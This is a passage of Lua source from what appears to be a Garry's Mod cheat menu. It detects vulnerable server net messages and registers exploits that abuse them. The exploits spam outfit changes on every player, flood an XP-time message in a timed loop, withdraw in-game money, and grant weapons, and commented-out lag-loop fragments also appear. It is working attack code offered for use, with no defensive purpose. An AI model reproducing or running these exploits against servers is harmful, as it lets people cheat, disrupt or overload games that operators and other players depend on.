  5101. net.Start("SBP_addtime",true)
  5102. net.SendToServer()
  5103. end
  5104. end )
  5105. end )
  5106. end
  5108. status = ValidNetString("NetData")
  5109. if (status) then
  5110. ECPrint("Found Exploit: Outfit player nouser [NetData]")
  5111. addExploit( "292","Outfit player nouser", "Just noise players near u (discovered by Solly)", function()
  5112. surface.PlaySound("garrysmod/ui_click.wav")
  5113. ECNotify("Starting")
  5114. for k, v in pairs(player.GetAll()) do
  5115. net.Start("NetData")
  5116. net.WriteString("OF")
  5117. net.WriteUInt(4,8)
  5118. net.WriteData(math.random(100000,9999999)..",sis.mdl",30)
  5119. net.SendToServer()
  5120. end
  5121. end )
  5122. end
  5124. status = ValidNetString("SBP_addtime")
  5125. if (status) then
  5126. ECPrint("Found Exploit: XP Booster [SBP_addtime]")
  5127. addExploit( "293","XP Booster", "discovered by Solly", function()
  5128. inputFrameExists = true
  5129. inputFrame = vgui.Create( "DFrame" )
  5130. inputFrame:SetTitle("Enter the number")
  5131. inputFrame:SetSize( 400, 75 )
  5132. inputFrame:SetPos(ScrW() / 2 - inputFrame:GetWide() / 2, ScrH() / 2 + 230 )
  5133. inputFrame:SetDraggable(false)
  5134. inputFrame:ShowCloseButton(true)
  5135. inputFrame:MakePopup()
  5136. inputFrame.Paint = function( self, w, h )
  5137. draw.RoundedBox( 5, 0, 0, w, h, Color(30, 30, 30))
  5138. end
  5139. local TextEntry = vgui.Create( "DTextEntry", inputFrame )
  5140. TextEntry:SetSize( 380, 30 )
  5141. TextEntry:SetPos( inputFrame:GetWide() / 2 - TextEntry:GetWide() / 2, inputFrame:GetTall() / 2 - TextEntry:GetTall() / 2 )
  5142. TextEntry:SetText( "100" )
  5143. TextEntry.OnEnter = function( self )
  5144. surface.PlaySound("garrysmod/ui_click.wav")
  5145. timer.Create("ofn", 0.2, 0, function()
  5146. for i=1,tonumber(self:GetText()) do
  5147. net.Start("SBP_addtime")
  5148. net.SendToServer()
  5149. end
  5150. inputFrame:SetVisible(false)
  5151. end )
  5152. end
  5153. end )
  5154. end
  5167. ///////////////////////////////////////////// [OTHER] /////////////////////////////////////////////
  5169. status = ValidNetString("EnterpriseWithdraw")
  5170. if (status) then
  5171. ECPrint("Found Exploit: ENTERPRISE FOUND! [EnterpriseWithdraw]")
  5172. addExploit( "1337","ENTERPRISE FOUND!", "discovered by Leith", function()
  5173. surface.PlaySound("garrysmod/ui_click.wav")
  5174. ECNotify("Starting")
  5175. net.Start("EnterpriseWithdraw")
  5176. net.WriteInt(100, 32)
  5177. net.SendToServer()
  5178. end )
  5179. end
  5181. status = ValidNetString("SetPermaKnife")
  5182. if (status) then
  5183. ECPrint("Found Exploit: PERMA KNIFE FOUND [SetPermaKnife]")
  5184. addExploit( "1337","PERMA KNIFE FOUND", "PERMA KNIFE FOUND", function()
  5185. surface.PlaySound("garrysmod/ui_click.wav")
  5186. /*
  5187. function cockSucker(ply,cmd,args,argStr)
  5188. local ply = LocalPlayer()
  5190. net.Start( "SetPermaKnife" )
  5191. net.WriteString( string.TrimRight(argStr,".lua") )
  5192. net.SendToServer()
  5193. end
  5195. concommand.Add("gibe_weapon",cockSucker)
  5196. */
  5197. end )
  5198. end
  5200. ----------------------------------------------------------------------------------
  5201. -- for k, v in pairs(player.GetAll()) do
  5202. -- for k, v in pairs(ents.GetAll()) do
  5203. ----------------------------------------------------------------------------------
  5204. -- if !timer.Exists("lagger") then
  5205. -- timer.Create("lagger", 0, 0, function()
  5206. -- for i = 1, 1000 do
  5207. -----------------------------
  5208. -- 9999999999999999999999999999999999999999999999999999999999
  5209. -- 0xFFFFFFF
  5210. --------------------------------------------------------------------------------------------------
  5211. --------------------------------------------------------------------------------------------------
  5212. --------------------------------------------------------------------------------------------------
  5213. concommand.Add("exploits_open", function()
  5214. menu:SetVisible(true)
  5215. menu:MakePopup()
  5216. menu:AlphaTo(255, 0.5, 0)
  5217. -- hook.Add("RenderScreenspaceEffects", "menuBlur", function()
  5218. -- DrawToyTown( 3, ScrH() )
  5219. -- end)
  5220. end)
  5221. end
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